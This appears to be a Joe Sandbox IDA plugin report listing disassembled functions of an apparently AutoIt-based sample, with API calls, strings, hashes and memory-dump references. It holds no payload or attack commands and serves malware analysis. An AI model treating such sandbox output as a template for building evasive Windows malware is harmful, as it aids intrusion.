Instruction Fuzzy Hash: 07E0923111020ADFCB11AF98DC45E9637A6FB0A351F0580A5FA055B2B2C771E961EF61

Function 00DAF3AB Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.NTDLL ref: 00DAF3D0

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: DialogNtdllProc_
String ID:
API String ID: 3239928679-0
Opcode ID: 634c0e3d388885ee88b73c1af8948e564a1c440d3b86efa6145254d8729b0447
Instruction ID: 83ba4c7e5a815ea6bebad5863393f7ae391568b63f348bbe477128a1ca4f9ad6
Opcode Fuzzy Hash: 634c0e3d388885ee88b73c1af8948e564a1c440d3b86efa6145254d8729b0447
Instruction Fuzzy Hash: DDE0E27420020DEFCB01DF88D845E863BA5FB1A350F004094FD048B362C772A860EBB1

Function 00DAF37C Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.NTDLL ref: 00DAF3A1

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: DialogNtdllProc_
String ID:
API String ID: 3239928679-0
Opcode ID: f7a6e505a19ade605c7b0e86fc7513ae6036763665d4ec271efd05061d2c73d5
Instruction ID: 11b68eefa72bcad12bf8cf9865218381e32b3351d056cb96b667e702fdb78054
Opcode Fuzzy Hash: f7a6e505a19ade605c7b0e86fc7513ae6036763665d4ec271efd05061d2c73d5
Instruction Fuzzy Hash: 18E0E27420420DEFCB01DF88DC45E863BA5FB1A350F004094FD048B361C772A820DB71

Function 00D5B845 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00D5AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00D5AF8E

Part of subcall function 00D5B86E: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00D5B85B), ref: 00D5B926
Part of subcall function 00D5B86E: KillTimer.USER32(00000000,?,00000000,?,?,?,?,00D5B85B,00000000,?,?,00D5AF1E,?,?), ref: 00D5B9BD

NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,00D5AF1E,?,?), ref: 00D5B864

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Window$DestroyDialogKillLongNtdllProc_Timer
String ID:
API String ID: 2797419724-0
Opcode ID: a6d571f7f881d867a4ffbaf84d0ce6dfda85157a10d06617d9c6fbd67dc21bf1
Instruction ID: fd74b2275d5a615e04c5738c7821b7744b37777682d963d2c54c1cd21cfa7751
Opcode Fuzzy Hash: a6d571f7f881d867a4ffbaf84d0ce6dfda85157a10d06617d9c6fbd67dc21bf1
Instruction Fuzzy Hash: CAD0127114430C77DF102BA5DC07F493E1EEB51751F408431FE05692E18A71A5519575

Function 00D68E19 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 00D68E1F

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: dae4ff67a18b5e0abde2cbf80ff778c6fb846c85db5a258a955490a7e5fd8269
Instruction ID: 083ace20520c2eb751412dd27c09f5f6886fb11c342136abfb2ea61143a88f63
Opcode Fuzzy Hash: dae4ff67a18b5e0abde2cbf80ff778c6fb846c85db5a258a955490a7e5fd8269
Instruction Fuzzy Hash: F7A0123000060DA78A001B51EC048447F5DD6441507014020F40C40121873354104991

Function 00D6A937 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00D66AE9,00DF67D8,00000014), ref: 00D6A937

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 0bf6fe9d164d683248102ace3b2a2c103247773c5a7d2c82691f7599671eaf2f
Instruction ID: 4d2ee87f4f8522cf4ed224f8d64bf1f5eb9496d483508b2583e1dd441521e91f
Opcode Fuzzy Hash: 0bf6fe9d164d683248102ace3b2a2c103247773c5a7d2c82691f7599671eaf2f
Instruction Fuzzy Hash: 62B012B03033034FD7084B3DAC5461A39D597C9101345403D7003C2660DB308450DF00

Function 00D60EC4 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
Instruction ID: 967a305108b6a40c32d0cb30670f490eeb5f99ad2db8f52a02bd15fa20461f78
Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
Instruction Fuzzy Hash: 8BC180762052A34BDF2D867AC43553FBEA15EA27B131E076DE8B2CB4C4EE24C564D630

Function 00D612F9 Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
Instruction ID: 312ad417e7a7f58400f284a96eaf744f66b2dc4e4722f2d438b6918867c65232
Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
Instruction Fuzzy Hash: 21C18D7A2051A34BDF2D867AC43443FBEA15AA27B131E076DD8B3CB5D4EE24D528D630

Function 00D60A8F Relevance: .3, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction ID: c9d70cd61639dbe86a6eaa8f9993d850a2fa88211d8b7a803949afe3195e971a
Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction Fuzzy Hash: C8C19F722052A34BDF2D867E843443FBEA19AA27B531E076DE4B3CB4C5EE24D524D630

Function 00D60677 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 7df0e2bd2faee1c18dd28e57f4b229a2e7bb8c57e2a87c5863cb96d788f8100c
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: E6C19E722092934BEF2D867A843443FBFA15AA27B131E076ED4B3CB5C5EE24D524D670

Function 00D9A750 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00D9A7A5
DeleteObject.GDI32(00000000), ref: 00D9A7B7
DestroyWindow.USER32 ref: 00D9A7C5
GetDesktopWindow.USER32 ref: 00D9A7DF
GetWindowRect.USER32(00000000), ref: 00D9A7E6
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00D9A927
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00D9A937
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D9A97F
GetClientRect.USER32(00000000,?), ref: 00D9A98B
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00D9A9C5
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D9A9E7
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D9A9FA
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D9AA05
GlobalLock.KERNEL32(00000000), ref: 00D9AA0E
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D9AA1D
GlobalUnlock.KERNEL32(00000000), ref: 00D9AA26
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D9AA2D
GlobalFree.KERNEL32(00000000), ref: 00D9AA38
CreateStreamOnHGlobal.COMBASE(00000000,00000001,88C00000), ref: 00D9AA4A
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00DCD9BC,00000000), ref: 00D9AA60
GlobalFree.KERNEL32(00000000), ref: 00D9AA70
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00D9AA96
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00D9AAB5
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D9AAD7
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D9ACC4

Strings

static, xrefs: 00D9A9BF, 00D9AB16
DISPLAY, xrefs: 00D9AB27
, xrefs: 00D9AC4A
AutoIt v3, xrefs: 00D9A977

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: c070fc7c3713139efce10cd9f443cf7680925d3ad6f6ff75d20833eddcb57c17
Instruction ID: 465500b48b424c753088b7599ac5a728d6573e0baf1a185eb9125c4a31e48497
Opcode Fuzzy Hash: c070fc7c3713139efce10cd9f443cf7680925d3ad6f6ff75d20833eddcb57c17
Instruction Fuzzy Hash: 7D024D7590021AAFDF14DFA9CD89EAE7BB9EB48310F148159F915EB2A0D730AD41CB70

Function 00DAD095 Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00DAD0EB
GetSysColorBrush.USER32(0000000F), ref: 00DAD11C
GetSysColor.USER32(0000000F), ref: 00DAD128
SetBkColor.GDI32(?,000000FF), ref: 00DAD142
SelectObject.GDI32(?,00000000), ref: 00DAD151
InflateRect.USER32(?,000000FF,000000FF), ref: 00DAD17C
GetSysColor.USER32(00000010), ref: 00DAD184
CreateSolidBrush.GDI32(00000000), ref: 00DAD18B
FrameRect.USER32(?,?,00000000), ref: 00DAD19A
DeleteObject.GDI32(00000000), ref: 00DAD1A1
InflateRect.USER32(?,000000FE,000000FE), ref: 00DAD1EC
FillRect.USER32(?,?,00000000), ref: 00DAD21E
GetWindowLongW.USER32(?,000000F0), ref: 00DAD249

Part of subcall function 00DAD385: GetSysColor.USER32(00000012), ref: 00DAD3BE
Part of subcall function 00DAD385: SetTextColor.GDI32(?,?), ref: 00DAD3C2
Part of subcall function 00DAD385: GetSysColorBrush.USER32(0000000F), ref: 00DAD3D8
Part of subcall function 00DAD385: GetSysColor.USER32(0000000F), ref: 00DAD3E3
Part of subcall function 00DAD385: GetSysColor.USER32(00000011), ref: 00DAD400
Part of subcall function 00DAD385: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00DAD40E
Part of subcall function 00DAD385: SelectObject.GDI32(?,00000000), ref: 00DAD41F
Part of subcall function 00DAD385: SetBkColor.GDI32(?,00000000), ref: 00DAD428
Part of subcall function 00DAD385: SelectObject.GDI32(?,?), ref: 00DAD435
Part of subcall function 00DAD385: InflateRect.USER32(?,000000FF,000000FF), ref: 00DAD454
Part of subcall function 00DAD385: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00DAD46B
Part of subcall function 00DAD385: GetWindowLongW.USER32(00000000,000000F0), ref: 00DAD480
Part of subcall function 00DAD385: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00DAD4A8

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: 9487083770ff0aae63c4beda56cbf70ea7270a5880b2dc6e2b5df3e0bcc032bc
Instruction ID: 0e7428e41906a5b9ce65eac677a0948690b92784e245df85c24b11a942d3345c
Opcode Fuzzy Hash: 9487083770ff0aae63c4beda56cbf70ea7270a5880b2dc6e2b5df3e0bcc032bc
Instruction Fuzzy Hash: A2916171408302BFDB109F64DC48E5BBBAAFF86325F140A29F562D62E0D775D944CB62

Function 00D9A3F7 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00D9A42A
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00D9A4E9
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00D9A527
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00D9A539
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00D9A57F
GetClientRect.USER32(00000000,?), ref: 00D9A58B
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00D9A5CF
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00D9A5DE
GetStockObject.GDI32(00000011), ref: 00D9A5EE
SelectObject.GDI32(00000000,00000000), ref: 00D9A5F2
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00D9A602
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00D9A60B
DeleteDC.GDI32(00000000), ref: 00D9A614
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00D9A642
SendMessageW.USER32(00000030,00000000,00000001), ref: 00D9A659
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00D9A694
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00D9A6A8
SendMessageW.USER32(00000404,00000001,00000000), ref: 00D9A6B9
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00D9A6E9
GetStockObject.GDI32(00000011), ref: 00D9A6F4
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00D9A6FF
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00D9A709

Strings

msctls_progress32, xrefs: 00D9A68A
static, xrefs: 00D9A5C9, 00D9A6E3
DISPLAY, xrefs: 00D9A5D4
AutoIt v3, xrefs: 00D9A577

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: e05317132db8520a8eb6ea5c7297e3cac25fe1b94ed64a91ebedda37e1f833b2
Instruction ID: 16f6af1967c2376b36d4e47b148141251a265a8a70066605055214f6380ca005
Opcode Fuzzy Hash: e05317132db8520a8eb6ea5c7297e3cac25fe1b94ed64a91ebedda37e1f833b2
Instruction Fuzzy Hash: ADA14C71A40219BFEB14DBA9DD4AFAE7BB9EB04710F008114F615EB2E0D770AD44CB60

Function 00D8E44C Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00D8E45E
GetDriveTypeW.KERNEL32(?,00DDDC88,?,\\.\,00DDDBF0), ref: 00D8E54B
SetErrorMode.KERNEL32(00000000,00DDDC88,?,\\.\,00DDDBF0), ref: 00D8E6B1

Strings

USB, xrefs: 00D8E645
Fibre, xrefs: 00D8E63E
ATA, xrefs: 00D8E629
SSD, xrefs: 00D8E5D8
Removable, xrefs: 00D8E59D
Unknown, xrefs: 00D8E56B, 00D8E614
SSA, xrefs: 00D8E637
FileBackedVirtual, xrefs: 00D8E67D
Fixed, xrefs: 00D8E593
PhysicalDrive, xrefs: 00D8E4EF
SAS, xrefs: 00D8E65A
MMC, xrefs: 00D8E66F
ATAPI, xrefs: 00D8E622
1394, xrefs: 00D8E630
iSCSI, xrefs: 00D8E653
CDROM, xrefs: 00D8E57F
RAID, xrefs: 00D8E64C
Virtual, xrefs: 00D8E676
RAMDisk, xrefs: 00D8E575
Network, xrefs: 00D8E589
\\.\, xrefs: 00D8E4B3
SCSI, xrefs: 00D8E61B
SATA, xrefs: 00D8E661

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
